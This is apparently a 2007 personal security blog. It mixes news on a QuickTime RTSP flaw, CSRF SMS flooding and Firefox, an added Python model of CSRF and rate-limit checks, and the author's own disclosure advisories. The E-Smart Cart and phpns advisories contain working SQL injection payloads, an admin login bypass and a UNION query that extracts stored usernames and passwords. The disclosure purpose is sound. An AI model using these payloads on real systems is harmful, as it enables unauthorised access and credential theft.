Tuesday, November 27, 2007

Critical vulnerability in QuickTime 7.3

USCert has issued a warning concerning a buffer overflow in the current version of Apple QuickTime. Attackers can manipulate content type headers in an RTSP data stream to cause a buffer overflow that allows malicious code to be injected into the system under attack. Users of Apple's iTunes multimedia software are also affected by the hole because the current version of QuickTime is installed on systems when iTunes is installed.

Demo programs that reportedly demonstrate the vulnerability have already popped up in the milw0rm archive. Until Apple releases a patch for this vulnerability, the only workaround for the playback of RTSP streams is to use other software or to restrict the use of streaming data via the firewall. Users are also advised to be careful with QuickTime Link files (.qtl), which can also reference RTSP sources. Apple released version 7.3 only a few weeks ago.


This vulnerability also affects Windows Vista, giving an attacker permission to control a remote machine.

Proof of concept: Here
Advisory from CERT: Here

Friday, November 23, 2007

CSRF on mobile phones

Today I read a good article about using CSRF (Cross-site Request Forgery) on mobile phones. It exploits the lack of verification of SMS limits on some phone services like ring tones, favorites, etc. It was posted on Bugtraq, but you can read more about this on the original website.

No. I'm not going to show you how to use Cross-Site Request Forgery (CSRF) in order to attack mobile phones while using a mobile phone to surf the web. Instead, I'm going to talk about how CSRF vulnerabilities can be used to cause denial-of-service attacks against mobile phones, by flooding the phone with SMS and service messages.

Mobile phone service providers in Israel, and throughout the world, provide a web interface to send SMS messages. Fortunately, they limit the SMS sending web interface to 20 messages per day, and they also require the user to log in to their web site in order to send an SMS.

Unfortunately, at least when referring to the Israeli providers, they also give attackers a way to send endless SMS and service messages without any kind of authentication and with a simple HTTP request. While this method doesn't allow specifying the message of the SMS, it does allow the attacker to specify the targeted phone number.


Full article
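To show why the unauthenticated send path described above is usable for flooding while a properly guarded one is not, here is an added example, a constructed model of a carrier's SMS web endpoint rather than any real provider's code. The SmsGateway class, its session and token handling, and the 555-0100 recipient are all assumptions made for the demonstration; only the 20-per-day cap comes from the article.

```python
import hmac
import secrets
from collections import defaultdict

DAILY_SMS_LIMIT = 20  # the per-day cap the article says the login-protected form enforces

class SmsGateway:
    """Constructed model of a carrier's web SMS endpoint (not any real provider's code)."""

    def __init__(self):
        self.sent = []                       # (sender, recipient) for every message that went out
        self.sent_today = defaultdict(int)   # per-account counter; a real system resets it daily
        self.csrf_tokens = {}                # session id -> token embedded in the send form

    def issue_form(self, session_id):
        # Called when the logged-in user loads the send form; the token is tied to the session.
        token = secrets.token_hex(16)
        self.csrf_tokens[session_id] = token
        return token

    def send_unauthenticated(self, recipient):
        # The weak path the article describes: one HTTP request carrying a number, with no
        # login, no token and no counter. Any page the victim visits can fire it in a loop.
        self.sent.append((None, recipient))
        return "sent"

    def send_guarded(self, session_user, session_id, form_token, recipient):
        # Require a login; the session comes from a cookie the browser attaches automatically.
        if session_user is None:
            return "denied: login required"
        # Require the per-session token; a cross-site page cannot read it, so forged
        # requests arrive with the cookie but without a valid token.
        expected = self.csrf_tokens.get(session_id)
        if expected is None or not hmac.compare_digest(expected, form_token or ""):
            return "denied: bad csrf token"
        # Apply the daily cap on this path too, so it cannot be used for flooding.
        if self.sent_today[session_user] >= DAILY_SMS_LIMIT:
            return "denied: daily limit reached"
        self.sent_today[session_user] += 1
        self.sent.append((session_user, recipient))
        return "sent"
```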

Wednesday, November 21, 2007

Mozilla fights for security in beta 3

The Mozilla Foundation released on Monday a beta version of the group's latest open-source Firefox browser, rewriting parts of the code and enhancing security.

Firefox 3 Beta 1 adds anti-malware features to the browser, using a similar mechanism as the anti-phishing feature in Firefox 2, harnessing a Google-generated blacklist of sites that are hosting malicious code. The beta version of the browser also checks plugins to make sure they are compatible with the software and uses a secure download mechanism for updates.


In SecurityFocus

I actually use the Opera browser, but I used Mozilla for years, so if you want, take a look at the Mozilla beta 3 (here)

Some browser statistics links:
http://www.w3schools.com/browsers/default.asp
http://operawatch.com/news/2006/08/some-opera-statistics-2.html
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers

Tuesday, November 6, 2007

DIM application

I finished my school project about controlling pharmaceutical sales representatives in Portuguese health centers and hospitals. It's coded in Visual Basic .NET and uses a SQL Server database. Simple, fast and secure: login credentials are checked by stored procedures. You can see some screenshots here:

Screen 1
Screen 2
Screen 3
Screen 4

Sunday, September 2, 2007

E-Smart Cart SQL Injection

Software: E-Smart Card
Vendor link: http://www.hostnomi.com/cart.htm
Attack: SQL Injection (admin bypass)

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. The vulnerable file is embadmin/login.asp, and a malicious user can bypass the administration login.

Proof of Concept:
embadmin/login.asp

user: 'or''='
pass: 'or''='


Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted and waiting for reply.

Wednesday, August 29, 2007

PHPNS SQL Injection

Software: phpns current version (v1.1)
Vendor link: http://phpns.com
Attack: SQL Injection

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. The vulnerable variable is $nid, and possibly others.

Proof of Concept:
/phpns/shownews.php?id=1'[SQL Injection]

Shows username : pass from userinfo
/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),
username,char(32,112,97,115,115,119,111,114,100,58),password),
null,null,null from userinfo/*

Solution:

Your script should filter metacharacters from user input.

Vendor:

Contacted; they replied that they are fixing it.

Tuesday, August 28, 2007

Old school ascii artwork

I know it's kind of old, but this thing rules at all times. I first saw the Star Wars telnet ASCII thing like 8/10 years ago and it still rox.

# For star wars
telnet towel.blinkenlights.nl

# For DOS chat room and some extras
telnet centralperk.us 2323